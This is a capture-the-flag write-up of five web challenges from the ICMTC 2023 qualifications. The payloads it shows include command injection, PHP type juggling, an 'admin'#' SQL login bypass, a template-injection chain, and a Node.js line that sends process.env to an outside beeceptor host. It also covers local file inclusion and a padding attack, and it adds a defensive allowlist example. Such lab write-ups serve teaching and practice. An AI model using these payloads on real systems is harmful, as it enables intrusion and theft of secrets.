ICMTC CTF Qualifications 2023 Web Challenge Write-up

Ahmed Magdy
Jul 4, 2023

Hi, my name is Ahmed Magdy :)

I would like to thank all the organizers for this CTF.

ICMTC CTF

Let's go solve the web challenges.

Ah shit, here we go again.

1 - Challenge Name : Ping me

Ping

A ping (Packet Internet or Inter-Network Groper) is a basic Internet program that allows a user to test and verify if a particular destination IP address exists.

The input is passed to a command in a Linux terminal, and the page prints the output of the command.

;ls

Any command containing spaces is not allowed:

No Hacking Please!

I have a trick: using a command without any spaces.

After searching the server, I found a directory named /tmp.

After reading the contents of the files, I found many flags; one of them is correct.
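An added example, not code from the challenge or from the original write-up: why a filter that only rejects spaces lets `;ls` through, and what a fix looks like. The filter's behaviour is an assumption inferred from the description above, the handler is assumed to ping IPv4 addresses only, and all function names are hypothetical.

```python
import ipaddress
import subprocess


def naive_filter_allows(user_input: str) -> bool:
    """Blocklist as the challenge appears to behave (assumption): reject only spaces."""
    return " " not in user_input


def build_ping_argv(target: str) -> list[str]:
    """Return an argv list for ping, or raise ValueError if target is not an IPv4 literal."""
    # Allowlist: IPv4Address accepts only four dot-separated decimal octets,
    # so characters such as ; | & $ can never survive validation.
    addr = ipaddress.IPv4Address(target.strip())
    # A list argv means no shell parses the value; "--" ends option parsing.
    return ["ping", "-c", "1", "--", str(addr)]


def ping(target: str) -> str:
    """Run ping without a shell and return its stdout."""
    argv = build_ping_argv(target)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5, check=False)
    return result.stdout


# Constructed sample inputs; ";ls" is the input shown in the write-up.
SAMPLES = ["127.0.0.1", ";ls", "127.0.0.1;ls"]


def classify(samples=SAMPLES):
    """Map each sample to (passes the space blocklist?, passes the allowlist?)."""
    out = {}
    for s in samples:
        try:
            build_ping_argv(s)
            strict = True
        except ValueError:
            strict = False
        out[s] = (naive_filter_allows(s), strict)
    return out


if __name__ == "__main__":
    for sample, (naive, strict) in classify().items():
        print(f"{sample!r:16} blocklist={naive!s:5} allowlist={strict}")
```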

2 - Challenge Name : Comparison

This PHP code compares the input in the text parameter.

If both conditions are true, it will print the flag.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md

I have found that 0010e2 = 1e3 = 1000

The correct flag appears when 1000 is in the text parameter.

3 - Challenge Name : hidden in plain sight

Nothing Here

I didn't find anything in the source code.

Let’s see what is in robots.txt

/su3rSecrttttt/

Opening /su3rSecrttttt/ redirects to a login page.

I will try SQL injection to see if anything happens.

SQL injection error

Now I need to bypass the login page.

Enter admin'# as the username and any password.

admin'# and any password

Looool Fake FlAG :(

I opened /su3rSecrttttt/ again, because I am now logged in as admin.

4 - Challenge Name : EvilCalc

When I saw the challenge, I thought it was SSTI.

So let's do it; the vulnerable parameter is taxes.

{{''|attr('__class__')|attr('__base__')|attr('__subclasses__')()}}

After trying some methods, I sent a request to my server.

It works. I understood the ReferenceError, and I will send another request, but with {JSON.stringify(process.env)

{var%20http=require('http');http.get(`http://ahmed.free.beeceptor.com/?data=${JSON.stringify(process.env)}`)}

5 - Challenge Name : Maze

After creating an account and logging in: admin@admin.com

I got the fake flag again.

NOT_REAL_FLAG

I found a comment in the source code:

<!-- The developer forget to remove /read_file?file -->

It is an LFI vulnerability, and I can read some files.

And the debugger page ("The debugger caught an exception in your WSGI application") is running.

app.py

I read the app.py file with the LFI.

After code review, I found that the Reset Password function is vulnerable to an AES-128 padding attack.

Entering any email creates a reset token.

I created a script to get the secret key >> resources

22@@@@Th!S_!s_s3cr3t113337771!!@@

After I got the secret key, I changed the role from user to admin.

End of the web challenges… I solved them :)

Thank you for your time to read this write-up :)

Contact me if you want: Facebook or LinkedIn
